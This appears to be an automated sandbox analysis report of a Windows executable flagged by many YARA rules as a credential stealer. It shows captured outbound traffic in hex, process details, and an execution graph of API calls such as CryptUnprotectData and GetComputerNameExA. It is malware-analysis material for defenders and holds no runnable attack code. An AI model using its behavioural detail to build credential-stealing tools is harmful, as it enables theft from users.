                                                                      2024-10-31 06:14:11 UTC15331OUTData Raw: 8e ea 99 a3 3f ea 1c 96 92 f2 de 89 c2 bb 7b 13 0e 6b b8 fd 1d 57 73 36 8f 5a 8c c1 68 46 6b 37 32 a6 f0 0e 20 ec 0f a4 58 fb 01 7a 30 ee 7f 95 76 92 d4 89 22 cf 20 65 15 46 e7 1b e9 2b 01 ad 90 ac 9b 84 1e 5b 67 79 4b 1c 69 88 a6 67 db b4 8d 02 68 8c 18 dd 3a a7 35 3c 5a ef dc c4 48 a7 a4 62 87 6c 74 f2 16 92 c6 c5 6f f1 49 22 76 21 a5 ec 9c 06 a9 1d 42 f3 e2 02 be 16 57 43 af c4 50 2d aa f4 36 d4 93 46 39 f2 fd 2d 1f f1 41 98 67 be 4f 9f 26 81 ba f7 80 56 fb 46 e5 cc 0f 92 dd 11 d3 a9 cd af c1 43 15 3f 48 3a 22 ae 57 20 85 3b 16 75 a3 79 f3 7c d6 b1 26 33 a0 6b e6 cb 20 03 05 ae b4 28 0e d0 5e f3 bc 4f 9f a3 b9 80 18 7f 5e ef 5f e9 c0 6e 92 fd 53 8d 5c 8d f0 be 6b 06 63 75 9d 84 42 5b 72 1b 17 2d c7 bf b2 49 60 3d 92 b8 de 7b c3 c3 05 f3 d7 15 ee e7 3d
                                                                      Data Ascii: ?{kWs6ZhFk72 Xz0v" eF+[gyKigh:5<ZHbltoI"v!BWCP-6F9-AgO&VFC?H:"W ;uy|&3k (^O^_nS\kcuB[r-I`={=
                                                                      2024-10-31 06:14:11 UTC15331OUTData Raw: ce b0 43 d2 3f de d5 7f d7 43 57 f4 bf f0 13 db f3 f6 15 a2 7e 93 e2 4e 1f 73 90 75 5e 68 0b fb 45 54 85 db 8b 50 9e 24 6f 33 70 82 ac 00 19 b6 6e b4 16 e5 ef dd 0b 5b 54 ad f5 ac cb 5b 3f 98 79 1b c6 7b c6 58 49 ec 59 4f d1 c8 a1 99 2e 29 5f 40 39 9b 07 ca 20 7e 9e 92 1d a2 09 03 f7 9d f9 44 14 5c 51 8c e9 7b 60 97 28 de ff ef 2b d4 55 a9 9e 5a da 87 40 e1 b9 e3 36 74 5a 07 49 05 05 b2 54 2f 50 61 38 1c b5 03 2c a0 d6 76 b1 72 69 54 14 8c 8a 47 d1 f0 30 61 10 ae c0 d8 9b 09 62 df 51 01 b1 c5 1d 00 d8 73 39 88 7f 1b 26 18 43 ea 5b 6d df 47 4e 3a e0 de 5e ab d2 df 1d af 9e 23 dc 72 00 8f 3d 47 71 80 28 5e 3f eb b3 ff 16 7c 20 3c 34 b0 83 05 8c 72 c7 b8 e3 84 cf 61 8b 8a 3a 7e ce d7 d5 82 62 d2 ee 68 68 4d 61 f5 ad 11 c2 03 81 60 63 20 54 97 78 6a 58 63 d5
                                                                      Data Ascii: C?CW~Nsu^hETP$o3pn[T[?y{XIYO.)_@9 ~D\Q{`(+UZ@6tZIT/Pa8,vriTG0abQs9&C[mGN:^#r=Gq(^?| <4ra:~bhhMa`c TxjXc
                                                                      2024-10-31 06:14:14 UTC1028INHTTP/1.1 200 OK
                                                                      Date: Thu, 31 Oct 2024 06:14:14 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: close
                                                                      Set-Cookie: PHPSESSID=34j9gu7gtscio331arr8k2n1qv; expires=Mon, 24-Feb-2025 00:00:52 GMT; Max-Age=9999999; path=/
                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                      Pragma: no-cache
                                                                      cf-cache-status: DYNAMIC
                                                                      vary: accept-encoding
                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pr%2FtT96twhYA5fbtTJwV65QD5I%2FBCuqC7m25J19DRh3fYHcadylbT2IMMNw5qm2ZoCRye8obqT1zBMBz1zf5pTgid%2F6NBahQNK%2FxDk1F%2BX%2FB9cUPlzJvyKzW%2F87f4u6f2EM8N9o%3D"}],"group":"cf-nel","max_age":604800}
                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                      Server: cloudflare
                                                                      CF-RAY: 8db180e4084a4635-DFW
                                                                      alt-svc: h3=":443"; ma=86400
                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=987&sent=215&recv=621&lost=0&retrans=0&sent_bytes=2845&recv_bytes=588492&delivery_rate=2833659&cwnd=248&unsent_bytes=0&cid=b93823cf0b8baffd&ts=2557&x=0"


                                                                      Statistics

                                                                      CPU Usage

                                                                      Click to jump to process

                                                                      Memory Usage

                                                                      Click to jump to process

                                                                      High Level Behavior Distribution

                                                                      Click to dive into process behavior distribution

                                                                      System Behavior

                                                                      General

                                                                      Target ID:0
                                                                      Start time:02:14:00
                                                                      Start date:31/10/2024
                                                                      Path:C:\Users\user\Desktop\file.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:"C:\Users\user\Desktop\file.exe"
                                                                      Imagebase:0x600000
                                                                      File size:3'093'504 bytes
                                                                      MD5 hash:900B4F529C53A8740D16C0372DC2CA9A
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2086942025.00000000010B1000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2086909296.00000000010A6000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2102016717.00000000010B1000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2087372814.00000000010B1000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2102226797.00000000010B2000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2101970932.00000000010A6000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2102168913.00000000010B2000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2103573537.00000000010B3000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2061774988.00000000010A6000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2074555367.00000000010A6000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2061829602.00000000010B1000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2062200123.00000000010A6000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2103604047.00000000010B3000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2075150921.00000000010A6000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                      Reputation:low
                                                                      Has exited:true

                                                                      Disassembly

                                                                      Reset < >

                                                                        Execution Graph

                                                                        Execution Coverage:4.9%
                                                                        Dynamic/Decrypted Code Coverage:0%
                                                                        Signature Coverage:59.2%
                                                                        Total number of Nodes:240
                                                                        Total number of Limit Nodes:23
                                                                        execution_graph 20857 626022 20858 626046 20857->20858 20860 6261d8 20858->20860 20861 640f10 LdrInitializeThunk 20858->20861 20861->20858 20862 610ca0 CoInitializeSecurity 20864 610cc2 20862->20864 20863 61103d 20864->20863 20866 63e210 20864->20866 20867 63e2b0 20866->20867 20868 63e228 RtlFreeHeap 20866->20868 20867->20864 20868->20867 20870 640e25 20871 640ee0 20870->20871 20872 640e33 20870->20872 20873 640ee8 20870->20873 20874 640e41 20870->20874 20879 63e1b0 20871->20879 20872->20873 20872->20874 20876 63e210 RtlFreeHeap 20873->20876 20874->20874 20877 640ec8 RtlReAllocateHeap 20874->20877 20878 640ee6 20876->20878 20877->20878 20880 63e1d0 20879->20880 20880->20880 20881 63e1f8 RtlAllocateHeap 20880->20881 20881->20878 20882 625160 20883 6251b0 20882->20883 20884 62516e 20882->20884 20888 625270 20884->20888 20886 62522c 20886->20883 20887 623770 LdrInitializeThunk 20886->20887 20887->20883 20889 625280 20888->20889 20892 6446d0 20889->20892 20891 62535f 20893 6446f0 20892->20893 20893->20893 20894 64482e 20893->20894 20896 640f10 LdrInitializeThunk 20893->20896 20894->20891 20896->20894 20897 61f522 20901 61f520 20897->20901 20898 61f696 20903 621100 LdrInitializeThunk 20898->20903 20899 61f6e8 20901->20897 20901->20898 20901->20899 20902 6446d0 LdrInitializeThunk 20901->20902 20902->20901 20904 6411e1 20905 6411e0 20904->20905 20905->20904 20907 6411ee 20905->20907 20910 640f10 LdrInitializeThunk 20905->20910 20909 640f10 LdrInitializeThunk 20907->20909 20909->20907 20910->20907 20911 625b27 20912 625b2f 20911->20912 20913 63e1b0 RtlAllocateHeap 20912->20913 20915 625b5a 20913->20915 20914 625c56 20915->20914 20917 640f10 LdrInitializeThunk 20915->20917 20917->20915 20918 63bca9 20919 63bcf0 20918->20919 20919->20919 20920 63bd18 SysAllocString 20919->20920 20921 63bd45 20920->20921 20922 63c107 20921->20922 20923 63c0b0 20921->20923 20924 63bd55 CoSetProxyBlanket 20921->20924 20925 63c09a SysFreeString SysFreeString 20921->20925 20926 63bd79 20921->20926 20935 63c10f 20921->20935 20931 63c0e6 GetVolumeInformationW 20923->20931 20924->20922 20924->20923 20924->20925 20924->20926 20924->20935 20925->20923 20926->20922 20926->20925 20926->20926 20926->20935 20927 63c332 20930 63e210 RtlFreeHeap 20927->20930 20928 63e700 LdrInitializeThunk 20932 63c2ce 20928->20932 20929 63e1b0 RtlAllocateHeap 20936 63c243 20929->20936 20937 63c338 20930->20937 20931->20922 20931->20935 20932->20922 20932->20927 20932->20928 20933 63e510 LdrInitializeThunk 20932->20933 20941 63e650 LdrInitializeThunk 20932->20941 20933->20932 20935->20922 20935->20927 20935->20929 20935->20932 20935->20935 20936->20932 20940 640f10 LdrInitializeThunk 20936->20940 20937->20922 20942 640f10 LdrInitializeThunk 20937->20942 20940->20932 20941->20932 20942->20922 20943 630dad 20944 630dcb 20943->20944 20945 630eab FreeLibrary 20944->20945 20946 641336 20947 641360 20946->20947 20949 6413ae 20947->20949 20952 640f10 LdrInitializeThunk 20947->20952 20951 640f10 LdrInitializeThunk 20949->20951 20951->20949 20952->20949 20965 644d70 20966 644d90 20965->20966 20968 644dee 20966->20968 20975 640f10 LdrInitializeThunk 20966->20975 20967 64502c 20968->20967 20970 63e1b0 RtlAllocateHeap 20968->20970 20973 644e88 20970->20973 20971 63e210 RtlFreeHeap 20971->20967 20972 644eff 20972->20971 20973->20972 20976 640f10 LdrInitializeThunk 20973->20976 20975->20968 20976->20972 20978 61d7f8 20979 61d7fd 20978->20979 20988 644880 20979->20988 20981 61d80c 20983 61d849 20981->20983 20986 61db7e 20981->20986 20987 61d90e 20981->20987 20992 644950 20981->20992 20983->20986 20983->20987 20998 640f10 LdrInitializeThunk 20983->20998 20985 61db5f CryptUnprotectData 20985->20986 20987->20985 20987->20986 20990 6448a0 20988->20990 20989 6448fe 20989->20981 20990->20989 20999 640f10 LdrInitializeThunk 20990->20999 20993 644970 20992->20993 20996 6449ce 20993->20996 21000 640f10 LdrInitializeThunk 20993->21000 20994 644a7e 20994->20983 20996->20994 21001 640f10 LdrInitializeThunk 20996->21001 20998->20987 20999->20989 21000->20996 21001->20994 21002 611bfc 21004 611a5a 21002->21004 21003 611e18 21004->21002 21004->21003 21005 63e210 RtlFreeHeap 21004->21005 21005->21004 21006 6235c2 21007 6235d0 21006->21007 21008 6446d0 LdrInitializeThunk 21007->21008 21010 623626 21008->21010 21009 6446d0 LdrInitializeThunk 21009->21010 21010->21009 21011 644c40 21013 644c60 21011->21013 21012 644d3f 21013->21012 21015 640f10 LdrInitializeThunk 21013->21015 21015->21012 21016 634ac6 CoSetProxyBlanket 21017 64154c 21018 641580 21017->21018 21021 640f10 LdrInitializeThunk 21018->21021 21020 6415f4 21021->21020 21022 617089 21023 6170d0 21022->21023 21026 61d010 21023->21026 21025 6170f3 21027 61d190 21026->21027 21027->21027 21040 644520 21027->21040 21029 61d30c 21030 61d32f 21029->21030 21031 644880 LdrInitializeThunk 21029->21031 21033 61d35e 21029->21033 21035 61d561 21029->21035 21038 61d36d 21029->21038 21039 61d688 21029->21039 21032 644950 LdrInitializeThunk 21030->21032 21030->21033 21030->21035 21030->21038 21030->21039 21031->21030 21032->21033 21033->21035 21033->21038 21033->21039 21044 640f10 LdrInitializeThunk 21033->21044 21035->21035 21036 644520 LdrInitializeThunk 21035->21036 21036->21039 21037 644520 LdrInitializeThunk 21037->21039 21038->21025 21039->21037 21039->21039 21042 644540 21040->21042 21041 64467e 21041->21029 21042->21041 21045 640f10 LdrInitializeThunk 21042->21045 21044->21035 21045->21041 21046 61104f 21051 611054 21046->21051 21047 611378 CoUninitialize 21050 6113b0 21047->21050 21049 6279b0 LdrInitializeThunk 21052 6111f4 21049->21052 21051->21049 21051->21050 21072 61132a 21051->21072 21073 61127c 21051->21073 21084 628045 RtlAllocateHeap RtlFreeHeap LdrInitializeThunk 21052->21084 21053 6112a2 21105 628045 RtlAllocateHeap RtlFreeHeap LdrInitializeThunk 21053->21105 21056 61122c 21085 62ab20 21056->21085 21057 6112da 21059 62ab20 3 API calls 21057->21059 21061 6112fc 21059->21061 21063 62b070 3 API calls 21061->21063 21065 611305 21063->21065 21106 62dba0 LdrInitializeThunk 21065->21106 21072->21047 21074 6279b0 21073->21074 21075 627a20 21074->21075 21076 6446d0 LdrInitializeThunk 21075->21076 21082 627c31 21076->21082 21077 627db7 21077->21077 21078 627ef2 21077->21078 21081 627dd0 21077->21081 21107 625540 LdrInitializeThunk 21077->21107 21078->21078 21108 625390 LdrInitializeThunk 21078->21108 21081->21053 21082->21077 21082->21078 21082->21081 21082->21082 21083 6446d0 LdrInitializeThunk 21082->21083 21083->21077 21084->21056 21086 62ab40 21085->21086 21087 62abae 21086->21087 21109 640f10 LdrInitializeThunk 21086->21109 21089 63e1b0 RtlAllocateHeap 21087->21089 21092 61124e 21087->21092 21090 62ac63 21089->21090 21094 62acee 21090->21094 21110 640f10 LdrInitializeThunk 21090->21110 21091 63e210 RtlFreeHeap 21091->21092 21095 62b070 21092->21095 21094->21091 21111 62b090 21095->21111 21105->21057 21108->21081 21109->21087 21110->21094 21112 62b0f0 21111->21112 21112->21112 21115 63e2c0 21112->21115 21116 63e2f0 21115->21116 21118 63e34e 21116->21118 21125 640f10 LdrInitializeThunk 21116->21125 21117 62b155 21118->21117 21120 63e1b0 RtlAllocateHeap 21118->21120 21122 63e3cc 21120->21122 21121 63e210 RtlFreeHeap 21121->21117 21123 63e43e 21122->21123 21126 640f10 LdrInitializeThunk 21122->21126 21123->21121 21125->21118 21126->21123 21127 60cf90 21131 60cfb0 21127->21131 21128 60d1c4 ExitProcess 21129 60d1bf 21144 640de0 FreeLibrary 21129->21144 21131->21128 21131->21129 21137 60e1a0 21131->21137 21133 60d1b1 21133->21129 21143 610b90 CoInitializeEx 21133->21143 21142 60e1c0 21137->21142 21138 60ec20 RtlFreeHeap 21138->21142 21139 63e210 RtlFreeHeap 21140 60e284 21139->21140 21140->21133 21141 60e485 21141->21139 21141->21140 21142->21138 21142->21140 21142->21141 21144->21128 21145 62f9d0 21155 643a90 21145->21155 21148 62fa30 GetComputerNameExA 21150 62fae0 21148->21150 21151 63032a GetPhysicallyInstalledSystemMemory 21150->21151 21153 630349 21151->21153 21152 6307c9 21153->21152 21157 640f10 LdrInitializeThunk 21153->21157 21156 62f9e3 GetComputerNameExA 21155->21156 21156->21148 21157->21153 21158 62a510 21165 645040 RtlAllocateHeap RtlFreeHeap LdrInitializeThunk 21158->21165 21160 62a490 21160->21158 21162 62a3a0 21160->21162 21161 62a06f 21162->21161 21164 640f10 LdrInitializeThunk 21162->21164 21164->21161 21165->21160 21166 63085f 21168 6305d0 21166->21168 21167 6307c9 21168->21167 21168->21168 21170 640f10 LdrInitializeThunk 21168->21170 21170->21168 21176 6315dc 21177 6314c3 21176->21177 21179 6314db 21177->21179 21180 63b7b0 21177->21180 21179->21179 21181 63b7d8 21180->21181 21184 63b8bf 21181->21184 21189 640f10 LdrInitializeThunk 21181->21189 21183 63bb08 21183->21179 21184->21183 21186 63b9dc 21184->21186 21188 640f10 LdrInitializeThunk 21184->21188 21186->21183 21190 640f10 LdrInitializeThunk 21186->21190 21188->21184 21189->21181 21190->21186

                                                                        Executed Functions

                                                                        Function 0060EC20 Relevance: 20.4, Strings: 16, Instructions: 397COMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 8 60ec20-60ec51 9 60ec60-60eca2 8->9 9->9 10 60eca4-60ed9f 9->10 11 60eda0-60eda8 10->11 11->11 12 60edaa-60eddf 11->12 13 60ede0-60ee1f 12->13 13->13 14 60ee21-60ee46 call 60fa80 13->14 16 60ee4b-60ee50 14->16 17 60efb4-60efb6 16->17 18 60ee56-60ee79 16->18 19 60f13a-60f146 17->19 20 60ee80-60eed2 18->20 20->20 21 60eed4-60eeda 20->21 22 60eee0-60eeea 21->22 23 60eef1-60eef5 22->23 24 60eeec-60eeef 22->24 25 60f131-60f137 call 63e210 23->25 26 60eefb-60ef1f 23->26 24->22 24->23 25->19 28 60ef20-60ef67 26->28 28->28 30 60ef69-60ef79 28->30 31 60efbb-60efbd 30->31 32 60ef7b-60ef81 30->32 33 60efc3-60efff 31->33 34 60f12f 31->34 35 60ef97-60ef9b 32->35 37 60f000-60f025 33->37 34->25 35->34 36 60efa1-60efa8 35->36 38 60efaa-60efac 36->38 39 60efae 36->39 37->37 40 60f027-60f033 37->40 38->39 41 60ef90-60ef95 39->41 42 60efb0-60efb2 39->42 43 60f074-60f076 40->43 44 60f035-60f03f 40->44 41->31 41->35 42->41 43->34 45 60f07c-60f099 43->45 46 60f057-60f05b 44->46 47 60f0a0-60f0ba 45->47 46->34 48 60f061-60f068 46->48 47->47 49 60f0bc-60f0c6 47->49 50 60f06a-60f06c 48->50 51 60f06e 48->51 52 60f100-60f102 49->52 53 60f0c8-60f0d7 49->53 50->51 54 60f050-60f055 51->54 55 60f070-60f072 51->55 57 60f10c-60f12d call 60e990 52->57 56 60f0e7-60f0eb 53->56 54->43 54->46 55->54 56->34 58 60f0ed-60f0f4 56->58 57->25 60 60f0f6-60f0f8 58->60 61 60f0fa 58->61 60->61 63 60f0e0-60f0e5 61->63 64 60f0fc-60f0fe 61->64 63->56 65 60f104-60f10a 63->65 64->63 65->34 65->57
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2155862356.0000000000601000.00000040.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                        • Associated: 00000000.00000002.2155846625.0000000000600000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2155895274.0000000000659000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2155912222.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2155926723.0000000000665000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2155940624.0000000000666000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2155955886.0000000000667000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156039473.00000000007CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156053250.00000000007CD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156070174.00000000007E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156070174.00000000007F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156103073.000000000081B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156115455.000000000081C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156130626.0000000000825000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156143843.0000000000826000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156156791.0000000000827000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156169515.0000000000828000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156182839.000000000082F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156197184.000000000083E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156213393.0000000000851000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156227217.0000000000858000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156239801.0000000000859000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156253486.000000000085D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156266060.000000000085E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156294268.0000000000868000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156312435.000000000087D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156325652.000000000087F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156337917.0000000000880000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156351117.0000000000887000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156364474.0000000000890000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156376920.0000000000893000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156391412.0000000000894000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156404038.0000000000895000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156416779.0000000000896000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156430199.000000000089C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156449646.00000000008BC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156464953.00000000008BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156464953.00000000008E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156502636.000000000090C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156519788.000000000090D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156533988.000000000090E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156533988.0000000000915000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156564951.0000000000923000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156577837.0000000000924000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_600000_file.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: &A-C$5Q<S$6$6E+G$7U9W$8]S_$<Y?[$>M"O$E-A/$I)^+$M%E'$O9M;$P!N#$dc$eI?K$jabc
                                                                        • API String ID: 0-600622405
                                                                        • Opcode ID: 39753dc9a14289faa83a43af611b52653f5b95f53f68f28f7025aec005e710e2
                                                                        • Instruction ID: 5874165300abce2a9d64c4d377ba99c487ef9fd58468dc8785366b8170e0abe1
                                                                        • Opcode Fuzzy Hash: 39753dc9a14289faa83a43af611b52653f5b95f53f68f28f7025aec005e710e2
                                                                        • Instruction Fuzzy Hash: 8CD1177164C3918FC728CF24D4903ABBBE2AFD1714F18896DE4D54B392D776890ACB92
                                                                        Function 0063BCA9 Relevance: 12.6, APIs: 5, Strings: 2, Instructions: 350memoryCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 126 63bca9-63bcef 127 63bcf0-63bd16 126->127 127->127 128 63bd18-63bd4e SysAllocString 127->128 130 63c062 128->130 131 63c020-63c04b 128->131 132 63c107-63c10e 128->132 133 63bf0a-63bf6f 128->133 134 63bec9-63bee5 128->134 135 63c06f-63c078 call 60c890 128->135 136 63c10f-63c119 128->136 137 63bfcc-63c00b call 6321d0 call 60c880 call 60d2b0 128->137 138 63c052-63c05b 128->138 139 63c0b0-63c0b6 128->139 140 63c090-63c096 128->140 141 63bd55-63bd72 CoSetProxyBlanket 128->141 142 63c07b-63c08c 128->142 143 63c0ba-63c100 call 643a90 GetVolumeInformationW 128->143 144 63c09a-63c0ac SysFreeString * 2 128->144 145 63bd79-63bd96 128->145 130->135 131->130 131->132 131->135 131->136 131->138 131->142 158 63bf70-63bf94 133->158 155 63bee9-63bf03 134->155 135->142 148 63c120-63c13a 136->148 137->130 137->131 137->132 137->135 137->136 137->138 137->142 138->130 138->131 138->132 138->135 138->136 138->138 138->142 139->143 140->144 141->130 141->131 141->132 141->133 141->134 141->135 141->136 141->137 141->138 141->139 141->140 141->142 141->144 141->145 142->140 143->132 143->136 144->139 147 63bda0-63bdc8 145->147 147->147 152 63bdca-63be53 147->152 148->132 165 63c141-63c148 148->165 166 63c160-63c165 148->166 167 63c14f-63c159 148->167 168 63be60-63be90 152->168 155->130 155->131 155->132 155->133 155->135 155->136 155->137 155->138 155->140 155->142 158->158 161 63bf96-63bfab 158->161 201 63bfaf-63bfc5 161->201 165->166 165->167 182 63c170 166->182 167->166 169 63c1e1-63c1e6 167->169 170 63c180 167->170 171 63c440-63c44a call 63e510 167->171 172 63c466-63c46e call 63e700 167->172 173 63c486-63c48e 167->173 174 63c32a-63c32f 167->174 175 63c3ec-63c42d call 63e4e0 167->175 176 63c473-63c480 call 63e700 167->176 177 63c172-63c174 167->177 178 63c1d2-63c1da 167->178 179 63c232-63c234 167->179 180 63c332-63c34b call 63e210 167->180 181 63c311-63c323 167->181 167->182 183 63c1d0 167->183 184 63c1f0 167->184 185 63c330 167->185 186 63c450-63c455 167->186 187 63c3d0 167->187 188 63c1f6-63c1fa 167->188 189 63c436-63c43b call 63e510 167->189 190 63c239-63c25b call 63e1b0 167->190 191 63c45c 167->191 168->168 196 63be92-63beb5 168->196 203 63c1c0-63c1c6 169->203 200 63c183-63c1a7 call 622dd0 170->200 171->186 172->176 199 63c3d4-63c3e5 call 63e650 173->199 174->185 175->189 176->173 177->200 178->169 178->171 178->172 178->173 178->174 178->175 178->176 178->179 178->180 178->181 178->184 178->185 178->186 178->187 178->188 178->189 178->190 178->191 204 63c4b2-63c4b9 179->204 221 63c350-63c392 180->221 181->171 181->172 181->173 181->174 181->175 181->176 181->180 181->185 181->186 181->187 181->189 181->191 183->178 184->188 186->172 186->173 186->176 186->187 186->191 195 63c787-63c797 186->195 187->199 188->148 189->171 220 63c260-63c2a2 190->220 191->172 218 63c799 195->218 226 63beb9-63bec2 196->226 199->171 199->172 199->173 199->174 199->175 199->176 199->180 199->185 199->186 199->187 199->189 199->191 199->195 225 63c1b0-63c1b8 200->225 201->130 201->131 201->132 201->135 201->136 201->137 201->138 201->142 203->183 218->218 220->220 223 63c2a4-63c2b0 220->223 221->221 224 63c394-63c39c 221->224 228 63c2b2-63c2ba 223->228 229 63c2fa-63c30a 223->229 230 63c3a2-63c3af 224->230 231 63c4ad-63c4b0 224->231 225->225 227 63c1ba-63c1bf 225->227 226->130 226->131 226->132 226->133 226->134 226->135 226->136 226->137 226->138 226->140 226->142 226->144 227->203 232 63c2c0-63c2c7 228->232 229->171 229->172 229->173 229->174 229->175 229->176 229->180 229->181 229->185 229->186 229->187 229->189 229->191 233 63c3b0-63c3b7 230->233 231->204 234 63c2d0-63c2d6 232->234 235 63c2c9-63c2cc 232->235 236 63c493-63c499 233->236 237 63c3bd-63c3c0 233->237 234->229 239 63c2d8-63c2f7 call 640f10 234->239 235->232 238 63c2ce 235->238 236->231 241 63c49b-63c4aa call 640f10 236->241 237->233 240 63c3c2 237->240 238->229 